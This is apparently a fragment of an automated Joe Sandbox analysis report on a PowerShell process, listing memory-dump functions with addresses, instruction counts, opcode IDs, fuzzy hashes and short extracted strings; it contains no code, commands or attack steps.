                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1943fad0c3f9692398130dca241e15bea7f607f9aa665081b2800aa54b64d820
                                                                                                                                                                                    • Instruction ID: 009ee9c3483194c1d59e0c1b77d35d830233d764c2b459bf00bdc05bd64fbc57
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1943fad0c3f9692398130dca241e15bea7f607f9aa665081b2800aa54b64d820
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2410E316442049FDB14DBB4D958AAE7BB6EF88750F184468E406AB7B1CF359D82CB90
                                                                                                                                                                                    Function 00D12BB0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c0830f67cd03b8779a22e0bc84726a061f82b42912107e65a75dfb81ff798cb5
                                                                                                                                                                                    • Instruction ID: 1c98f6fa5eb5daafa2a89ed228a9f3c7710d1a827827989aa34f7f2058f15fd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0830f67cd03b8779a22e0bc84726a061f82b42912107e65a75dfb81ff798cb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 584135B0A005059FCB09CF98D5949BAFBB2FF48310B158199D905AB364CB36FC90CBA4
                                                                                                                                                                                    Function 070A885C Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e9215ea4e126de9ccf7aedfd77779a69d4ce5d40cc5faafc1513575a9f69094f
                                                                                                                                                                                    • Instruction ID: 6588d86f809811fc35bbe5747a43d440a2628d45710cc46d359a7de39d585125
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9215ea4e126de9ccf7aedfd77779a69d4ce5d40cc5faafc1513575a9f69094f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25314CB2700202EFDF161AE898116BABBD29FC2350F18C676D5419B2D1DF36D855C3E2
                                                                                                                                                                                    Function 08F90B72 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 96cd930ef06a3aa9d07eb863e41521ff6b45f44e85ec3b724eadd5eb408d324d
                                                                                                                                                                                    • Instruction ID: d29f42c3d1735600ea87c1dd1216b368b929b26f3bfb0fcc9dc47fb8e56b5123
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96cd930ef06a3aa9d07eb863e41521ff6b45f44e85ec3b724eadd5eb408d324d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B73119B4A00609DFCB14CF69C590AAAFBF1FF89310B248699D559EB365C732EC41CB90
                                                                                                                                                                                    Function 009FF51B Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction ID: f0eec14eb04f851606d1ffd132d7a5f47c4a030a70ced90cd396e12f22da96e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E521CD76504244DFCF06CF10D9C4B26BF72FF58314F24C6A9E9094A666C33AD86ACB91
                                                                                                                                                                                    Function 08F90798 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8595f46fa8d10e11b9c906fa5c1e2ac61aab6b6a27c8581443ab17d405a5515c
                                                                                                                                                                                    • Instruction ID: 7355d5f29d00fbbdcddbfcdd8325d5ced7311763c59d918531403720db20edc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8595f46fa8d10e11b9c906fa5c1e2ac61aab6b6a27c8581443ab17d405a5515c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01753590D3D55FC703A77D94645EA7F74EE83210B1540E7D0D48B1A3DA245849C7A5
                                                                                                                                                                                    Function 009FD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8a04dbaedd5cfe19120f5b5096bc18b548c0362ffc51c90acb6922e5173cf6af
                                                                                                                                                                                    • Instruction ID: e069435d71fb892a52df971c52e51b52527eb69542ea28817927a353db3d0a64
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a04dbaedd5cfe19120f5b5096bc18b548c0362ffc51c90acb6922e5173cf6af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4301A77140A3489AE7104A25CD84777BF9DDF51324F1CC52AEE484B246CA79D945CBB1
                                                                                                                                                                                    Function 00D1F530 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cff2d5f28a7953f7511302f80b91cdfdc7b4dec431623ceef461d8cccb4a5dc7
                                                                                                                                                                                    • Instruction ID: b6f469c2260ec90ee974c1b558bfe98be58216eb6669e79ca68b42714c2cd0c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: cff2d5f28a7953f7511302f80b91cdfdc7b4dec431623ceef461d8cccb4a5dc7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D016D357042108F8B066B39E86847E3BA3EFD9622319445EE48AC7357DE698C868B52
                                                                                                                                                                                    Function 00D1F540 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 01fdcd6dc63653ae84479f4d463e567c244464b668dbfc4aba1e877b086faef5
                                                                                                                                                                                    • Instruction ID: 010e0a40f3890d0d36ff56b323c71cb6c87b29fd7c73cba6f3c423fae1a5abca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01fdcd6dc63653ae84479f4d463e567c244464b668dbfc4aba1e877b086faef5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01D35700610DB86056B29E46887E77A7EBCD622315441EE98BC3356EE799C828B92
                                                                                                                                                                                    Function 009FD01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5d4aa0e96c27f3701bf380021ee597cf742bf62d6605182ca8af1d59144c90b5
                                                                                                                                                                                    • Instruction ID: 323f56c79d9b8beaaa6cc00608c60be8953f385c0a7acb33143f9313ab895152
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4aa0e96c27f3701bf380021ee597cf742bf62d6605182ca8af1d59144c90b5
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF0C27100A344AEE7108A16CCC4B62FFACEF51334F18C55AED480F286C6799844CBB0
                                                                                                                                                                                    Function 00D1FDEC Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6a2787ea812bc77e5e987d744b457412dade532adc6c3de3b4d41441a4e22a51
                                                                                                                                                                                    • Instruction ID: 2f47e68b44d473b5cdeddc8e548a9f5bf48fa9fd1d8400cdeb68be6081b8d236
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a2787ea812bc77e5e987d744b457412dade532adc6c3de3b4d41441a4e22a51
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE0E5709002499E8784DF788941199BFF0AB19210B2085AEC418DB222E7328A42CB91
                                                                                                                                                                                    Function 00D1FDF8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                    • Instruction ID: 751e191de12ae14f989a7a566296f731112a01d130901daa809c3d79554a09dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CD06270D0420D9F8780DFADD94156DFBF4EB48210F6085BA9919D7311E73296528BD1

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 070AE9F5 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                                                                                                                                                    • API String ID: 0-2339188973
                                                                                                                                                                                    • Opcode ID: 6e6bc5ab72a3f23435b87f78e11837d277445b4e54af37078a509d77e067c3ae
                                                                                                                                                                                    • Instruction ID: a56a8c2ce4c889d02b2dfec8d44a8c3396c95b17698d23d6aa716d7f970f6de9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e6bc5ab72a3f23435b87f78e11837d277445b4e54af37078a509d77e067c3ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9A14C70710209AFCB24DF98C54666FBBE2BF84310F148669E8059F394DB31EC41C7A1
                                                                                                                                                                                    Function 070AE17D Relevance: 14.0, Strings: 11, Instructions: 209COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$84xl$84xl$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                                                                                                    • API String ID: 0-3951631063
                                                                                                                                                                                    • Opcode ID: 36785c2c01437f4910aafbab52768985f4b3230ae060a268dda8d4c831e07410
                                                                                                                                                                                    • Instruction ID: fc81b279b3fda98becaae0eb211a4bb4033c5438a2e4aaf5a774e939131c7848
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36785c2c01437f4910aafbab52768985f4b3230ae060a268dda8d4c831e07410
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02714CB1B00216EFDB249FA8D956A7EBBE2AF85710F148669E9018F390CF31DD41C791
                                                                                                                                                                                    Function 08FA2488 Relevance: 11.6, Strings: 9, Instructions: 383COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-71533908
                                                                                                                                                                                    • Opcode ID: 78ab167f01bc0eb8094e5c0cfd256de872787c2adf32d1d10afa5b54730b8463
                                                                                                                                                                                    • Instruction ID: a439a7a0402c473280abb7aa1dce9fe52a6d5c8eebab797962c3124f36362a34
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78ab167f01bc0eb8094e5c0cfd256de872787c2adf32d1d10afa5b54730b8463
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83D1D9B1F002049FCB149F79C95076ABBA2FFC8721F14846AE9059B391DB32DD45C7A1
                                                                                                                                                                                    Function 08FA33AA Relevance: 10.3, Strings: 8, Instructions: 324COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-614951495
                                                                                                                                                                                    • Opcode ID: 3317597745ce19dd125d887b1758b1f29914853d30b4b79d2e169d95ff311056
                                                                                                                                                                                    • Instruction ID: b9f3b005baf893de32dc4469519373f6cf30ce5942d9451d4251f42a42e7980c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3317597745ce19dd125d887b1758b1f29914853d30b4b79d2e169d95ff311056
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46C1C0B5F002099FCB14DF68C544A6ABBE6FF88721F248869E9059B390DB31DC56CBD1
                                                                                                                                                                                    Function 08FA0FA8 Relevance: 10.3, Strings: 8, Instructions: 259COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-614951495
                                                                                                                                                                                    • Opcode ID: 6f0247c37fdcf90998ed3970f3ee8ecaafc8458ec6e02ac6aa916baf48f916d8
                                                                                                                                                                                    • Instruction ID: a8022d3eb3dd6d29b2b896bc0917aac94b72d411d2a2ea4aa81dd5fc3664d174
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f0247c37fdcf90998ed3970f3ee8ecaafc8458ec6e02ac6aa916baf48f916d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1491C4B1F40204DFCB149F78C944A6ABBE6FBC8321F15886DE9069B394DA31DC82C791
                                                                                                                                                                                    Function 070AF475 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                                                                                                                                                                    • API String ID: 0-3956185284
                                                                                                                                                                                    • Opcode ID: 91d5b7ddf8c9d067864183183bbf0c58934d59b455b80388d2b4bb690b065182
                                                                                                                                                                                    • Instruction ID: 61eda65737e5625e0e8bfc50b879c7889cfe46abb181b8f379605f1aafefa892
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91d5b7ddf8c9d067864183183bbf0c58934d59b455b80388d2b4bb690b065182
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41613971B00106AFCB149FB98540A6ABBF2AF89310F24C669E9159F365CB71ED41CBA0
                                                                                                                                                                                    Function 070A1440 Relevance: 10.2, Strings: 8, Instructions: 190COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$pl$pl
                                                                                                                                                                                    • API String ID: 0-1171304976
                                                                                                                                                                                    • Opcode ID: 1f20f22887bf7f899d2a2c27683a69582c76eaf46f90c1c5d67ce9bc8c573400
                                                                                                                                                                                    • Instruction ID: 32c779ae128e266682642b7d0bf0f06497609cc87e0d68c4ae744c05e671e0ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f20f22887bf7f899d2a2c27683a69582c76eaf46f90c1c5d67ce9bc8c573400
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A517AB1B04349EFDB244BBD9804B6ABBF6AF86310F18C16BE056CF291DA71C844C751
                                                                                                                                                                                    Function 070A0AE8 Relevance: 8.9, Strings: 7, Instructions: 174COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q$pl$pl
                                                                                                                                                                                    • API String ID: 0-3679457024
                                                                                                                                                                                    • Opcode ID: d6aab175c4ead1c2e52c6cf6e9983cd1a188ec18d25f1a62ce649952838335dd
                                                                                                                                                                                    • Instruction ID: 1e94fff60175d96f76e1413f6d1d2fcaf3fb613d55762f22127d0fb437bd3ca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6aab175c4ead1c2e52c6cf6e9983cd1a188ec18d25f1a62ce649952838335dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07518CB231435A9FC7544BB9D90062ABBE1AFC6620F2885AFD445CF361EA32DC45C791
                                                                                                                                                                                    Function 070AD790 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3669853574
                                                                                                                                                                                    • Opcode ID: 631ed564b54f11a8c7e3e261f4e46bd9f330e7152f11f1e67510209912768c38
                                                                                                                                                                                    • Instruction ID: 71354583904a9770b2a2f009dfec5b162915d895e0d1fa2967c696ed6800090f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ed564b54f11a8c7e3e261f4e46bd9f330e7152f11f1e67510209912768c38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46615DB1B0420AEFCB598FA9D40466E7BF2AF82310F14C6BAD455CFA59DB31C845C791
                                                                                                                                                                                    Function 070AABC5 Relevance: 7.6, Strings: 6, Instructions: 136COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2392861976
                                                                                                                                                                                    • Opcode ID: b4fcbec3731a0542bada8fb56ebbee05fabedf7e287c1ce83c1c29581e7e1315
                                                                                                                                                                                    • Instruction ID: 614939e98875a7522429ffc2412bdd66385044be1f5444176c78ce9b818a61a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fcbec3731a0542bada8fb56ebbee05fabedf7e287c1ce83c1c29581e7e1315
                                                                                                                                                                                    • Instruction Fuzzy Hash: F34129F1B04347AFDB654AA594402AABBF1AF85211F24C67FC446CF382DA36C855C791
                                                                                                                                                                                    Function 070AE27E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$84xl$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                                                    • API String ID: 0-1648245520
                                                                                                                                                                                    • Opcode ID: 3857eb349ebacbd898a27b7526620f5b796f8208ba82250a0655ff08ae3d1c33
                                                                                                                                                                                    • Instruction ID: 0c9d965db0b0d83dfcb58305d98a7789acd5162361b0493aeb36fc42bb2d5f3c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3857eb349ebacbd898a27b7526620f5b796f8208ba82250a0655ff08ae3d1c33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31B1B1B00215EFD728DF98C549A6EBBF2BB89B10F248659E805AF350C731ED41CB91
                                                                                                                                                                                    Function 070AEE05 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$tP^q$tP^q$$^q
                                                                                                                                                                                    • API String ID: 0-1430180487
                                                                                                                                                                                    • Opcode ID: 8cdefc1dd56965d39c3c6cdbd9e654bd4b42d7fc458417f3528d33a0d153d296
                                                                                                                                                                                    • Instruction ID: ed15179b28e8f254a425072fa72db6be80e28d5d6224c4ab8298412a6aa907e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cdefc1dd56965d39c3c6cdbd9e654bd4b42d7fc458417f3528d33a0d153d296
                                                                                                                                                                                    • Instruction Fuzzy Hash: 70613671B00206AFCB14DFA8C501AAABBF2AF84314F14C669E9159F395CB32EC41C7A1
                                                                                                                                                                                    Function 070A0538 Relevance: 6.4, Strings: 5, Instructions: 150COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
